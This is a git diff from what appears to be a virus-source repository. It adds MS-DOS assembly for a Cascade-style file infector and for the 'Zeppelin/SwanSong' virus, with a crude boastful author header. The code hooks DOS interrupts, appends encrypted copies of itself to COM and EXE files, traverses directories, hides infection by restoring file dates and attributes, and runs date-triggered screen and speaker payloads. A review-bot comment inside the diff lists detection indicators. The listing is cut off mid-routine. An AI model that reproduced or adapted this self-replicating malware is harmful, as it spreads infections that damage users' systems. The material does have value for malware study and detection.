1980? 
+ JNE BP0130 ; Branch if not + PUSH DS + MOV AX,3528H ; Get interrupt 28H function + INT 21H ; DOS service + MOV I28_OF,BX ; Save interrupt 28H offset + MOV I28_SG,ES ; Save interrupt 28H segment + MOV AX,2528H ; Set interrupt 28H function + MOV DX,OFFSET INT_28 ; Int 28H routine address + PUSH CS ; \ Set DS to CS + POP DS ; / + INT 21H ; DOS service + POP DS + OR SWITCH,8 ; Set on No display switch + JMP BP0120 + + ; Year is 1988 + +BP0110: CMP DH,0AH ; October? + JB BP0130 ; Branch if not +BP0120: CALL TIMCYC ; Time one clock cycle + MOV AX,1518H ; Upper limit - 5400 + CALL RNDNUM ; Create random number + INC AX ; Add to random number + MOV I1CCNT,AX ; Set Int 1CH count + MOV I1CMAX,AX ; Set Int 1CH random no maximum + MOV RANPOS,1 ; Set num of lines to affect to 1 + MOV AX,351CH ; Get interrupt 1CH function + INT 21H ; DOS service + MOV I1C_OF,BX ; Save interrupt 1CH offset + MOV I1C_SG,ES ; Save interrupt 1CH segment + PUSH DS + MOV AX,251CH ; Set interrupt 1CH function + MOV DX,OFFSET INT_1C ; Int 1CH routine address + PUSH CS ; \ Set DS to CS + POP DS ; / + INT 21H ; DOS service + POP DS +BP0130: MOV BX,-2AH ; Set up relocation register + JMP BP0060 ; Branch to start program + + ; Interrupt 21H routine + +INT_21: CMP AH,4BH ; Load function? + JE I_2106 ; Branch if yes +I_2102: JMP I21BIO ; Branch to original int 21H + + ; Virus call + +I_2104: MOV DI,55AAH ; Virus call - signal back + LES AX,I21BIO ; Load return address + MOV DX,CS ; Load segment + IRET + + ; Load and execute function + +I_2106: CMP AL,0FFH ; Is this a virus call? + JE I_2104 ; Branch if yes + CMP AL,0 ; Load and execute? 
+ JNE I_2102 ; Branch if not + PUSHF + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH BP + PUSH ES + PUSH DS + MOV PATHOF,DX ; Save pathname offset + MOV PATHSG,DS ; Save pathname segment + PUSH CS ; \ Set ES to CS + POP ES ; / + MOV AX,3D00H ; Open handle function + INT 21H ; DOS service + JB I_2110 ; Branch if error + MOV BX,AX ; Move file handle + MOV AX,5700H ; Get file date and time function + INT 21H ; DOS service + MOV F_DATE,DX ; Save file date + MOV F_TIME,CX ; Save file time + MOV AH,3FH ; Read handle function + PUSH CS ; \ Set DS to CS + POP DS ; / + MOV DX,OFFSET PROG_1 ; \ First three bytes of program + MOV CX,3 ; / + INT 21H ; DOS service + JB I_2110 ; Branch if error + CMP AX,CX ; Correct length read? + JNE I_2110 ; Branch if error + MOV AX,4202H ; Move file pointer (EOF) function + XOR CX,CX ; \ No displacement + XOR DX,DX ; / + INT 21H ; DOS service + MOV F_SIZ1,AX ; File size - low word + MOV F_SIZ2,DX ; File size - high word + MOV AH,3EH ; Close handle function + INT 21H ; DOS service + CMP PROG_1,5A4DH ; Is it an EXE file? + JNE I_2108 ; Branch if not + JMP I_2124 ; Dont infect + +I_2108: CMP F_SIZ2,0 ; File size - high word + JA I_2110 ; Branch if file too big + CMP F_SIZ1,MAXLEN ; Maximum file size? 
+ JBE I_2112 ; Branch if file not too big +I_2110: JMP I_2124 ; Dont infect + +I_2112: CMP BYTE PTR PROG_1,0E9H ; Does program start with a branch + JNE I_2114 ; Branch if not + MOV AX,F_SIZ1 ; Get file size - low word + ADD AX,WORD PTR JMPADR ; Convert to infected offset + CMP AX,PROG_1+1 ; Is it the same + JE I_2110 ; Branch if already infected +I_2114: MOV AX,4300H ; Get file attributes function + LDS DX,F_PATH ; Pathname pointer + INT 21H ; DOS service + JB I_2110 ; Branch if error + MOV F_ATTR,CX ; Save file attributes + XOR CL,20H ; Change archive bit + TEST CL,27H ; Are there any attributes to change + JZ I_2116 ; Branch if not + MOV AX,4301H ; Set file attributes function + XOR CX,CX ; No attributes + INT 21H ; DOS service + JB I_2110 ; Branch if error +I_2116: MOV AX,3D02H ; Open handle (R/W) function + INT 21H ; DOS service + JB I_2110 ; Branch if error + MOV BX,AX ; Move file handle + MOV AX,4202H ; Move file pointer (EOF) function + XOR CX,CX ; \ No displacement + XOR DX,DX ; / + INT 21H ; DOS service + CALL CPYVIR ; Copy virus to program + JNB I_2118 ; Branch if no error + MOV AX,4200H ; Move file pointer (Start) function + MOV CX,F_SIZ2 ; File size - high word + MOV DX,F_SIZ1 ; File size - low word + INT 21H ; DOS service + MOV AH,40H ; Write handle function + XOR CX,CX ; Zero length (reset length} + INT 21H ; DOS service + JMP I_2120 ; Reset file details + +I_2118: MOV AX,4200H ; Move file pointer (Start) function + XOR CX,CX ; \ No displacement + XOR DX,DX ; / + INT 21H ; DOS service + JB I_2120 ; Branch if error + MOV AX,F_SIZ1 ; Get file size - low word + ADD AX,0FFFEH ; Convert to jump offset + MOV JUMP_2,AX ; Store in jump instruction + MOV AH,40H ; Write handle function + MOV DX,OFFSET JUMP_1 ; Address to jump instruction + MOV CX,3 ; Length of jump instruction + INT 21H ; DOS service +I_2120: MOV AX,5701H ; Set file date and time function + MOV DX,F_DATE ; Get old file date + MOV CX,F_TIME ; Get old file time + INT 21H ; DOS service + MOV 
AH,3EH ; Close handle function + INT 21H ; DOS service + MOV CX,F_ATTR ; Get old file attributes + TEST CL,7 ; System, read only or hidden? + JNZ I_2122 ; Branch if yes + TEST CL,20H ; Archive? + JNZ I_2124 ; Branch if yes +I_2122: MOV AX,4301H ; Set file attributes function + LDS DX,F_PATH ; Pathname pointer + INT 21H ; DOS service +I_2124: POP DS + POP ES + POP BP + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + POPF + JMP I_2102 ; Original interrupt 21H + + ; Create random number + +RNDNUM: PUSH DS + PUSH CS ; \ Set DS to CS + POP DS ; / + PUSH BX + PUSH CX + PUSH DX + PUSH AX ; Save multiplier + MOV CX,7 ; Seven words to move + MOV BX,OFFSET RANDOM+14 ; Last word of randomiser + PUSH [BX] ; Save last word +RND010: MOV AX,[BX-2] ; Get previous word + ADC [BX],AX ; Add to current word + DEC BX ; \ Address previous word + DEC BX ; / + LOOP RND010 ; Repeat for each word + POP AX ; Retrieve last word + ADC [BX],AX ; Add to first word + MOV DX,[BX] ; Get result + POP AX ; Recover multiplier + OR AX,AX ; Is there a multiplier? 
+ JZ RND020 ; Branch if not + MUL DX ; Multiply random number +RND020: MOV AX,DX ; Move result + POP DX + POP CX + POP BX + POP DS + RET + + ; Copy system clock + +GETCLK: PUSH DS + PUSH ES + PUSH SI + PUSH DI + PUSH CX + PUSH CS ; \ Set ES to CS + POP ES ; / + MOV CX,0040H ; \ Set DS to system RAM + MOV DS,CX ; / + MOV DI,OFFSET RANDOM ; Randomizer work area + MOV SI,006CH ; Address system clock + MOV CX,8 ; Eight bytes to copy + CLD + REPZ MOVSW ; Copy system clock + POP CX + POP DI + POP SI + POP ES + POP DS + RET + + ; Get character and attributes + + ASSUME DS:CODE +GETCHA: PUSH SI + PUSH DS + PUSH DX + MOV AL,DH ; Get row number + MUL NUMCOL ; Number of visible columns + MOV DH,0 ; Clear top of register + ADD AX,DX ; Add column number + SHL AX,1 ; Multiply by two + ADD AX,VDURAM ; Add VDU display start address + MOV SI,AX ; Move character pointer + TEST C80_SW,0FFH ; Test 80 column text switch + MOV DS,RAM_SG ; Video RAM segment + JZ GTC030 ; Branch if switch off + MOV DX,03DAH ; VDU status register + CLI +GTC010: IN AL,DX ; Get VDU status + TEST AL,8 ; Is it frame flyback time + JNZ GTC030 ; Branch if yes + TEST AL,1 ; Test toggle bit + JNZ GTC010 ; Branch if on +GTC020: IN AL,DX ; Get VDU status + TEST AL,1 ; Test toggle bit + JZ GTC020 ; Branch if off +GTC030: LODSW ; Load character and attribute + STI + POP DX + POP DS + POP SI + RET + + ; Store character and attributes + +STOCHA: PUSH DI + PUSH ES + PUSH DX + PUSH BX + MOV BX,AX + MOV AL,DH ; Get row number + MUL NUMCOL ; Number of visible columns + MOV DH,0 ; Clear top of register + ADD AX,DX ; Add column number + SHL AX,1 ; Multiply by two + ADD AX,VDURAM ; Add VDU display start address + MOV DI,AX ; Move character pointer + TEST C80_SW,0FFH ; Test 80 column text switch + MOV ES,RAM_SG ; Video RAM segment + JZ STO030 ; Branch if switch off + MOV DX,03DAH ; VDU status register + CLI +STO010: IN AL,DX ; Get VDU status + TEST AL,8 ; Is it frame flyback time + JNZ STO030 ; Branch if yes + TEST AL,1 ; Test 
toggle bit + JNZ STO010 ; Branch if on +STO020: IN AL,DX ; Get VDU status + TEST AL,1 ; Test toggle bit + JZ STO020 ; Branch if off +STO030: MOV AX,BX + STOSB ; Store character and attribute + STI + POP BX + POP DX + POP ES + POP DI + RET + + ; Delay loop + +DELAY: PUSH CX +DEL010: PUSH CX + MOV CX,LOOPCT ; Get timed loop count +DEL020: LOOP DEL020 + POP CX + LOOP DEL010 + POP CX + RET + + ; Toggle speaker drive + +CH_SND: PUSH AX + IN AL,61H ; Get port B + XOR AL,2 ; Toggle speaker drive + AND AL,0FEH ; Switch off speaker modulate + OUT 61H,AL ; Rewrite port B + POP AX + RET + + ; Is character 0, 32 or 255? + +IGNORE: CMP AL,0 ; Is it a zero? + JE IGN010 ; Branch if yes + CMP AL,20H ; Is it a space? + JE IGN010 ; Branch if yes + CMP AL,0FFH ; Is it FF? + JE IGN010 ; Branch if yes + CLC + RET + +IGN010: STC + RET + + ; Graphic display character + +GRAPHD: CMP AL,0B0H ; Is it below 176? + JB GRA010 ; Branch if yes + CMP AL,0DFH ; Is it above 223? + JA GRA010 ; Branch if yes + STC + RET + +GRA010: CLC + RET + + ; Time one clock cycle + +TIMCYC: PUSH DS + MOV AX,0040H ; \ Set DS to system RAM + MOV DS,AX ; / + STI + ASSUME DS:RAM + MOV AX,BW046C ; Get low word of system clock +TIM010: CMP AX,BW046C ; Has clock changed? + JE TIM010 ; Branch if not + XOR CX,CX ; Clear register + MOV AX,BW046C ; Get low word of system clock +TIM020: INC CX ; Increment count + JZ TIM040 ; Branch if now zero + CMP AX,BW046C ; Has clock changed? 
+ JE TIM020 ; Branch if not +TIM030: POP DS + ASSUME DS:NOTHING + MOV AX,CX ; Transfer count + XOR DX,DX ; Clear register + MOV CX,000FH ; \ Divide by 15 + DIV CX ; / + MOV LOOPCT,AX ; Save timed loop count + RET + +TIM040: DEC CX ; Set to minus one + JMP SHORT TIM030 + + ; Cascade display routine + + ASSUME DS:CODE +DISPLY: MOV NUMROW,18H ; Number of display rows + PUSH DS + MOV AX,0040H ; \ Set DS to system RAM + MOV DS,AX ; / + ASSUME DS:RAM + MOV AX,BW044E ; VDU display start address + POP DS + ASSUME DS:CODE + MOV VDURAM,AX ; Save VDU display start address + MOV DL,0FFH + MOV AX,1130H ; Get character generator information + MOV BH,0 ; Int 1FH vector + PUSH ES + PUSH BP + INT 10H ; VDU I/O + POP BP + POP ES + CMP DL,0FFH ; Is register unchanged? + JE DSP010 ; Branch if yes + MOV NUMROW,DL ; Number of display rows (EGA) +DSP010: MOV AH,0FH ; Get VDU parameters + INT 10H ; VDU I/O + MOV NUMCOL,AH ; Save number of columns + MOV C80_SW,0 ; Set off 80 column text switch + MOV RAM_SG,0B000H ; Video RAM segment - Mono + CMP AL,7 ; Mode 7? + JE DSP040 ; Branch if yes + JB DSP020 ; Branch if less + JMP DSP130 ; Switch off speaker and return + +DSP020: MOV RAM_SG,0B800H ; Video RAM segment + CMP AL,3 ; Display mode 3? + JA DSP040 ; Branch if above + CMP AL,2 ; Display mode 2? 
+ JB DSP040 ; Branch if below + MOV C80_SW,1 ; Set on 80 column text switch + MOV AL,NUMROW ; Number of display rows + INC AL ; Number, not offset + MUL NUMCOL ; Number of visible columns + MOV NUMPOS,AX ; Save number of display positions + MOV AX,RANPOS ; Get number of lines to affect + CMP AX,NUMPOS ; Number of display positions + JBE DSP030 ; Branch if within range + MOV AX,NUMPOS ; Get number of display positions +DSP030: CALL RNDNUM ; Create random number + INC AX ; Add to random number + MOV SI,AX ; Use as count +DSP040: XOR DI,DI ; Set second count to zero +DSP050: INC DI ; Increment second count + MOV AX,NUMPOS ; Get number of display positions + SHL AX,1 ; Multiply by two + CMP DI,AX ; Has second count reached this? + JBE DSP060 ; Branch if not + JMP DSP130 ; Switch off speaker and return + +DSP060: OR SWITCH,2 ; Set on switch 2 + MOV AL,NUMCOL ; \ Number of visible columns + MOV AH,0 ; / is upper limit + CALL RNDNUM ; Create random number + MOV DL,AL ; Random column number + MOV AL,NUMROW ; \ Number of display rows + MOV AH,0 ; / is upper limit + CALL RNDNUM ; Create random number + MOV DH,AL ; Random row number + CALL GETCHA ; Get character and attributes + CALL IGNORE ; Is character 0, 32 or 255? + JB DSP050 ; Branch if yes + CALL GRAPHD ; Is it a graphic display character + JB DSP050 ; Branch if yes + MOV CURCHA,AL ; Save current character + MOV CURATT,AH ; Save current attributes + MOV CL,NUMROW ; Number of display rows + MOV CH,0 ; Column zero +DSP070: INC DH ; Next row + CMP DH,NUMROW ; Was that the last row? + JA DSP110 ; Branch if yes + CALL GETCHA ; Get character and attributes + CMP AH,CURATT ; Are attributes the same? + JNE DSP110 ; Branch if not + CALL IGNORE ; Is character 0, 32 or 255? + JB DSP090 ; Branch if yes +DSP080: CALL GRAPHD ; Is it a graphic display character + JB DSP110 ; Branch if yes + INC DH ; Next row + CMP DH,NUMROW ; Was that the last row? 
+ JA DSP110 ; Branch if yes + CALL GETCHA ; Get character and attributes + CMP AH,CURATT ; Are attributes the same? + JNE DSP110 ; Branch if not + CALL IGNORE ; Is character 0, 32 or 255? + JNB DSP080 ; Branch if not + CALL CH_SND ; Toggle speaker drive + DEC DH ; Previous row + CALL GETCHA ; Get character and attributes + MOV CURCHA,AL ; Save current character + INC DH ; Next row +DSP090: AND SWITCH,0FDH ; Set off switch 2 + DEC DH ; Previous row + MOV AL,20H ; Replace character with space + CALL STOCHA ; Store character and attributes + INC DH ; Next row + MOV AL,CURCHA ; Get current character + CALL STOCHA ; Store character and attributes + JCXZ DSP100 ; Branch if end of count + CALL DELAY ; Delay loop + DEC CX ; Decrement count +DSP100: JMP SHORT DSP070 + +DSP110: TEST SWITCH,2 ; Test switch 2 + JZ DSP120 ; Branch if off + JMP DSP050 + +DSP120: CALL CH_SND ; Toggle speaker drive + DEC SI ; Subtract from count + JZ DSP130 ; Switch off speaker and return + JMP DSP040 + + ; Switch off speaker and return + +DSP130: IN AL,61H ; Get port B + AND AL,0FCH ; Switch off speaker + OUT 61H,AL ; Rewrite port B+ + RET + + ; Interrupt 1CH routine + + ASSUME DS:NOTHING +INT_1C: TEST SWITCH,9 ; No display or already active? 
+ JNZ I_1C40 ; Branch if either are on + OR SWITCH,1 ; Set on Int 1CH active switch + DEC I1CCNT ; Subtract from Int 1CH count + JNZ I_1C30 ; Branch if not zero + PUSH DS + PUSH ES + PUSH CS ; \ Set DS to CS + POP DS ; / + PUSH CS ; \ Set ES to CS + POP ES ; / + ASSUME DS:CODE + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH BP + MOV AL,20H ; \ Signal end of interrupt + OUT 20H,AL ; / + MOV AX,I1CMAX ; Get Int 1CH random no maximum + CMP AX,0438H ; Is it 1080 or above + JNB I_1C10 ; Branch if yes + MOV AX,0438H ; Upper limit - 1080 +I_1C10: CALL RNDNUM ; Create random number + INC AX ; Add to random number + MOV I1CCNT,AX ; Reset Int 1CH count + MOV I1CMAX,AX ; Reset Int 1CH random no maximum + CALL DISPLY ; Cascade display routine + MOV AX,3 ; Upper limit - 3 + CALL RNDNUM ; Create random number + INC AX ; Add to random number + MUL RANPOS ; Multiply by num of lines to affect + JNB I_1C20 ; Is result more than a word? + MOV AX,-1 ; Set to maximum +I_1C20: MOV RANPOS,AX ; Save number of lines to affect + POP BP + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + POP ES + POP DS + ASSUME DS:NOTHING +I_1C30: AND SWITCH,0FEH ; Set off Int 1CH active switch +I_1C40: JMP I1CBIO ; Branch to original int 1CH + + ; Interrupt 28H routine + +INT_28: TEST SWITCH,8 ; Test No display switch + JZ I_2830 ; Branch if not + PUSH AX + PUSH CX + PUSH DX + MOV AH,2AH ; Get date function + INT 21H ; DOS service + CMP CX,07C4H ; Year 1988? + JB I_2820 ; Not yet - do nothing + JA I_2810 ; After 1988 + CMP DH,0AH ; October? 
+ JB I_2820 ; Not yet - do nothing +I_2810: AND SWITCH,0F7H ; Set off No display switch +I_2820: POP DX + POP CX + POP AX +I_2830: JMP I28BIO ; Branch to original int 28H + + ; Copy virus to program + +CPYVIR: PUSH ES + PUSH BX + MOV AH,48H ; Allocate memory function + MOV BX,006BH ; Length of virus + INT 21H ; DOS service + POP BX + JNB CPY020 ; Branch if no error +CPY010: STC + POP ES + RET + +CPY020: MOV DB0100,1 ; Set encryption indicator + MOV ES,AX ; Set target segment to allocated + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + XOR DI,DI ; Start of allocated + MOV SI,OFFSET DB0100 ; Start of virus + MOV CX,VIRLEN ; Length of virus + CLD + REPZ MOVSB ; Copy virus + MOV DI,0023H ; Start of area to encrypt + MOV SI,OFFSET BP0030 ; Address of area + ADD SI,F_SIZ1 ; Length of target file + MOV CX,OFFSET ENDADR-BP0030 ; Length to encrypt +CPY030: XOR ES:[DI],SI ; \ Encrypt + XOR ES:[DI],CX ; / + INC DI ; \ Next address + INC SI ; / + LOOP CPY030 ; Repeat for all area + MOV DS,AX ; Allocated area segment + MOV AH,40H ; Write handle function + XOR DX,DX ; From start + MOV CX,VIRLEN ; Length of virus + INT 21H ; DOS service + PUSHF + PUSH AX + MOV AH,49H ; Free allocated memory function + INT 21H ; DOS service + POP AX + POPF + PUSH CS ; \ Set DS to CS + POP DS ; / + JB CPY010 ; Branch if error + CMP AX,CX ; Correct length written? + JNE CPY010 ; Branch if error + POP ES + CLC +CPY040: RET + +ENDADR EQU $ + +CODE ENDS + + END START + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.1717.asm b/MSDOS/Virus.MSDOS.Unknown.1717.asm new file mode 100644 index 00000000..8b8b1df4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1717.asm 
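Review bot: The comment on the STOSB in STOCHA overstates what the instruction does: `STOSB` writes only AL, so the attribute byte of the screen cell is never rewritten and only the character changes, whereas GETCHA's `LODSW` reads both; `STOSB ; Store character only (attribute byte left as is)` would match the code. For anyone building file checks from this listing, the I_2114/I_2120/I_2122 section is worth a note: read-only/hidden/system attributes are cleared before the write and restored afterwards, and `MOV AX,5701H` puts the original date and time back, so neither mtime nor attribute bits indicate infection. The indicators the listing itself supports are the on-disk test in I_2112 (a leading E9h whose target equals the file size minus VIRLEN+2) and the residency probe in I_2104 (INT 21h with AX=4BFFh answered with DI=55AAh), and a one-line comment at each of those labels saying so would make the listing more useful as a detection reference.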
@@ -0,0 +1,664 @@
+;**************************************************************************
+;
+;The Zeppelin Virus September 25, 1992
+;[MPC] Generated...
+;Created by... pAgE
+;As a TRiBuTe to John "back-beat" Bohnam, this "WEAK-DICK" ViRUS was made!
+;Incidently. He died on this date in 1980! Got drunk and strangled on a
+;CunT hAiR...oR wAs iT a tAmPoN???...Oh well, So goes RocK -n- RoLL...
+;By the wAy<---That's whAt you sAy just beforE you bOrE the FuCK out of
+;soMeoNe with anOthEr TRiViAl piEce of SHiT!!! These LiTTLe Up AnD LeTTeRS
+;ThAt yA'll uSe, ArE a KicK....
+;
+;Okay, enough anti-social, suicidal, satan, sputum...On with the ViRUS...
+; GeT'S in ThE bl00d DoEsn't it?------->^^^^^
+;
+;Here it is...
+;It's not much, but in the hands off a knowledgeable Vx WRiTeR.......
+;I'll keep workin' on it and see what I can do. In the mean time, have fun!
+;I ReM'd out a lot of the ShIt iN here, So Joe LuNChmEaT doesn;t FrY hImSelF.
+;
+;But...If that's not good enough, well then - hEy! - BLoW mE!
+;
+;***************************************************************************
+
+.model tiny ; Handy directive
+.code ; Virus code segment
+ org 100h ; COM file starting IP
+
+id = 'IS' ; ID word for EXE infections
+entry_point: db 0e9h,0,0 ; jmp decrypt
+
+decrypt: ; handles encryption and decryption
+patch_startencrypt:
+ mov di,offset startencrypt ; start of decryption
+ mov si,(offset heap - offset startencrypt)/2 ; iterations
+decrypt_loop:
+ db 2eh,81h,35h ; xor word ptr cs:[di], xxxx
+decrypt_value dw 0 ; initialised at zero for null effect
+ inc di ; calculate new decryption location
+ inc di
+ dec si ; If we are not done, then
+ jnz decrypt_loop ; decrypt mo'
+startencrypt:
+ call next ; calculate delta offset
+next:
+ pop bp ; bp = IP next
+ sub bp,offset next ; bp = delta offset
+
+
+ cmp sp,id ; COM or EXE?
+ je restoreEXE
+restoreCOM:
+ lea si,[bp+save3]
+ mov di,100h
+ push di ; For later return
+ movsb
+ jmp short restoreEXIT
+restoreEXE:
+ push ds
+ push es
+ push cs ; DS = CS
+ pop ds
+ push cs ; ES = CS
+ pop es
+ lea si,[bp+jmpsave2]
+ lea di,[bp+jmpsave]
+ movsw
+ movsw
+ movsw
+restoreEXIT:
+ movsw
+
+ mov byte ptr [bp+numinfec],5 ; reset infection counter
+
+ mov ah,1Ah ; Set new DTA
+ lea dx,[bp+newDTA] ; new DTA @ DS:DX
+ int 21h
+
+ mov ah,47h ; Get current directory
+ mov dl,0 ; Current drive
+ lea si,[bp+origdir] ; DS:SI->buffer
+ int 21h
+ mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR
+
+ mov ax,3524h ; Get int 24 handler
+ int 21h ; to ES:BX
+ mov word ptr [bp+oldint24],bx; Save it
+ mov word ptr [bp+oldint24+2],es
+ mov ah,25h ; Set new int 24 handler
+ lea dx,[bp+offset int24] ; DS:DX->new handler
+ int 21h
+ push cs ; Restore ES
+ pop es ; 'cuz it was changed
+
+dir_scan: ; "dot dot" traversal
+ lea dx,[bp+exe_mask]
+ call infect_mask
+ lea dx,[bp+com_mask]
+ call infect_mask
+ mov ah,3bh ; change directory
+ lea dx,[bp+dot_dot] ; "cd .."
+ int 21h
+ jnc dir_scan ; go back for mo!
+
+done_infections:
+ ;mov ah,2ah ; Get current date
+ ;int 21h
+ ;cmp dh,9 ; Check month
+ ;jb act_two
+ ;cmp dl,25 ; Check date
+ ;jb act_two
+ ;cmp cx,1992 ; Check year
+ ;jb act_two
+ ;cmp al,0 ; Check date of week
+ ;jb activate
+
+ ;mov ah,2ch ; Get current time
+ ;int 21h
+ ;cmp dl,50 ; Check the percentage
+ jbe activate
+
+exit_virus:
+ mov ax,2524h ; Restore int 24 handler
+ lds dx,[bp+offset oldint24] ; to original
+ int 21h
+ push cs
+ pop ds
+
+ mov ah,3bh ; change directory
+ lea dx,[bp+origdir-1] ; original directory
+ int 21h
+
+ mov ah,1ah ; restore DTA to default
+ mov dx,80h ; DTA in PSP
+ cmp sp,id-4 ; EXE or COM?
+ jz returnEXE
+returnCOM:
+ int 27h
+ retn ; 100h is on stack
+returnEXE:
+ pop es
+ pop ds
+ int 21h
+ mov ax,es ; AX = PSP segment
+ add ax,10h ; Adjust for PSP
+ add word ptr cs:[bp+jmpsave+2],ax
+ add ax,word ptr cs:[bp+stacksave+2]
+ cli ; Clear intrpts for stack manipulation
+ mov sp,word ptr cs:[bp+stacksave]
+ mov ss,ax
+ sti
+ db 0eah ; jmp ssss:oooo
+jmpsave dd ? ; Original CS:IP
+stacksave dd ? ; Original SS:SP
+jmpsave2 db ? ; Actually four bytes
+save3 db 0cdh,20h,0 ; First 3 bytes of COM file
+exe_mask db '*.exe',0
+com_mask db '*.com',0
+stacksave2 dd ?
+
+activate proc far
+
+start:
+ jmp short loc_1
+ db 90h
+data_2 db 0
+data_3 dw 216h
+ db 2
+data_4 dw 0
+ db 'Ripped this Motherfucker off'
+ db 1Ah
+data_5 db 'SHIT!!! Wont work....', 0Dh, 0Ah
+ db '$'
+loc_1:
+
+ mov ax,0003h ; stick 3 into ax.
+ int 10h ; Set up 80*25, text mode. Clear the screen, too.
+ mov ah,0Fh
+ int 10h ; Video display ah=functn 0Fh
+ ; get state, al=mode, bh=page
+ ; ah=columns on screen
+ mov bx,0B800h
+ cmp al,2
+ je loc_2 ; Jump if equal
+ cmp al,3
+ je loc_2 ; Jump if equal
+ mov data_2,0
+ mov bx,0B000h
+ cmp al,7
+ je loc_2 ; Jump if equal
+ mov dx,offset data_5 ; ('Unsupported Video Mode')
+ mov ah,9
+ int 21h ; DOS Services ah=function 09h
+ ; display char string at ds:dx
+ retn
+loc_2:
+ mov es,bx
+ mov di,data_4
+ mov si,offset data_6
+ mov dx,3DAh
+ mov bl,9
+ mov cx,data_3
+ cld ; Clear direction
+ xor ax,ax ; Zero register
+
+locloop_4:
+ lodsb ; String [si] to al
+ cmp al,1Bh
+ jne loc_5 ; Jump if not equal
+ xor ah,80h
+ jmp short loc_20
+loc_5:
+ cmp al,10h
+ jae loc_8 ; Jump if above or =
+ and ah,0F0h
+ or ah,al
+ jmp short loc_20
+loc_8:
+ cmp al,18h
+ je loc_11 ; Jump if equal
+ jnc loc_12 ; Jump if carry=0
+ sub al,10h
+ add al,al
+ add al,al
+ add al,al
+ add al,al
+ and ah,8Fh
+ or ah,al
+ jmp short loc_20
+loc_11:
+ mov di,data_4
+ add di,data_1e
+ mov data_4,di
+ jmp short loc_20
+loc_12:
+ mov bp,cx
+ mov cx,1
+ cmp al,19h
+ jne loc_13 ; Jump if 
not equal
+ lodsb ; String [si] to al
+ mov cl,al
+ mov al,20h ; ' '
+ dec bp
+ jmp short loc_14
+loc_13:
+ cmp al,1Ah
+ jne loc_15 ; Jump if not equal
+ lodsb ; String [si] to al
+ dec bp
+ mov cl,al
+ lodsb ; String [si] to al
+ dec bp
+loc_14:
+ inc cx
+loc_15:
+ cmp data_2,0
+ je loc_18 ; Jump if equal
+ mov bh,al
+
+locloop_16:
+ in al,dx ; port 3DAh, CGA/EGA vid status
+ rcr al,1 ; Rotate thru carry
+ jc locloop_16 ; Jump if carry Set
+loc_17:
+ in al,dx ; port 3DAh, CGA/EGA vid status
+ and al,bl
+ jnz loc_17 ; Jump if not zero
+ mov al,bh
+ stosw ; Store ax to es:[di]
+ loop locloop_16 ; Loop if cx > 0
+
+ jmp short loc_19
+loc_18:
+ rep stosw ; Rep when cx >0 Store ax to es:[di]
+loc_19:
+ mov cx,bp
+loc_20:
+ jcxz loc_new_25 ; Jump if cx=0
+ loop locloop_4 ; Loop if cx > 0
+loc_new_25:
+
+
+ mov si,offset data00 ; SI points to data
+get_note: mov bx,[si] ; Load BX with the frequency
+ or bx,bx ; Is BX equal to zero?
+ je play_tune_done ; If it is we are finished
+
+ mov ax,034DDh ;
+ mov dx,0012h ;
+ cmp dx,bx ;
+ jnb new_note ;
+ div bx ; This bit here was stolen
+ mov bx,ax ; from the Turbo C++ v1.0
+ in al,061h ; library file CS.LIB. I
+ test al,3 ; extracted sound() from the
+ jne skip_an_or ; library and linked it to
+ or al,3 ; an .EXE file, then diassembled
+ out 061h,al ; it. Basically this turns
+ mov al,0B6h ; on the speaker at a certain
+ out 043h,al ; frequency.
+skip_an_or: mov al,bl ;
+ out 042h,al ;
+ mov al,bh ;
+ out 042h,al ;
+
+ mov bx,[si + 2] ; BX holds duration value
+ xor ah,ah ; BIOS get time function
+ int 1Ah
+ add bx,dx ; Add the time to the length
+wait_loop: int 1Ah ; Get the time again (AH = 0)
+ cmp dx,bx ; Is the delay over?
+ jne wait_loop ; Repeat until it is
+ in al,061h ; Stolen from the nosound()
+ and al,0FCh ; procedure in Turbo C++ v1.0.
+ out 061h,al ; This turns off the speaker.
+
+new_note: add si,4 ; SI points to next note
+ jmp short get_note ; Repeat with the next note
+play_tune_done:
+activate endp
+
+ jmp exit_virus
+
+creator db '[pAgE]',0 ; YOU REALLY SHOULD TAKE THIS
+virusname db '[SwanSong]',0 ; BULLSHIT OUT OF HERE!!!
+author db 'pAgE',0 ; WHY NOT HOLD UP A SIGN!!!
+
+infect_mask:
+ mov ah,4eh ; find first file
+ mov cx,7 ; any attribute
+findfirstnext:
+ int 21h ; DS:DX points to mask
+ jc exit_infect_mask ; No mo files found
+
+ mov al,0h ; Open read only
+ call open
+
+ mov ah,3fh ; Read file to buffer
+ lea dx,[bp+buffer] ; @ DS:DX
+ mov cx,20h ; 1Ah bytes
+ int 21h
+
+ mov ah,3eh ; Close file
+ int 21h
+
+ cmp word ptr [bp+buffer],'ZM'; EXE?
+ jz checkEXE ; Why yes, yes it is!
+checkCOM:
+ mov ax,word ptr [bp+newDTA+1ah] ; Filesize in DTA
+ cmp ax,(heap-decrypt) ; Is it too small?
+ jb find_next
+
+ mov bx,word ptr [bp+buffer+1] ;get jmp location
+ add bx,(heap-decrypt+1) ; Adjust for virus size
+ cmp ax,bx
+ je find_next ; already infected
+ jmp infect_com
+checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected?
+ jnz infect_exe
+find_next:
+ mov ah,4fh ; find next file
+ jmp short findfirstnext
+exit_infect_mask: ret
+
+infect_exe:
+ les ax, dword ptr [bp+buffer+14h] ; Save old entry point
+ mov word ptr [bp+jmpsave2], ax
+ mov word ptr [bp+jmpsave2+2], es
+
+ les ax, dword ptr [bp+buffer+0Eh] ; Save old stack
+ mov word ptr [bp+stacksave2], es
+ mov word ptr [bp+stacksave2+2], ax
+
+ mov ax, word ptr [bp+buffer + 8] ; Get header size
+ mov cl, 4 ; convert to bytes
+ shl ax, cl
+ xchg ax, bx
+
+ les ax, [bp+offset newDTA+26]; Get file size
+ mov dx, es ; to DX:AX
+ push ax
+ push dx
+
+ sub ax, bx ; Subtract header size from
+ sbb dx, 0 ; file size
+
+ mov cx, 10h ; Convert to segment:offset
+ div cx ; form
+
+ mov word ptr [bp+buffer+14h], dx ; New entry point
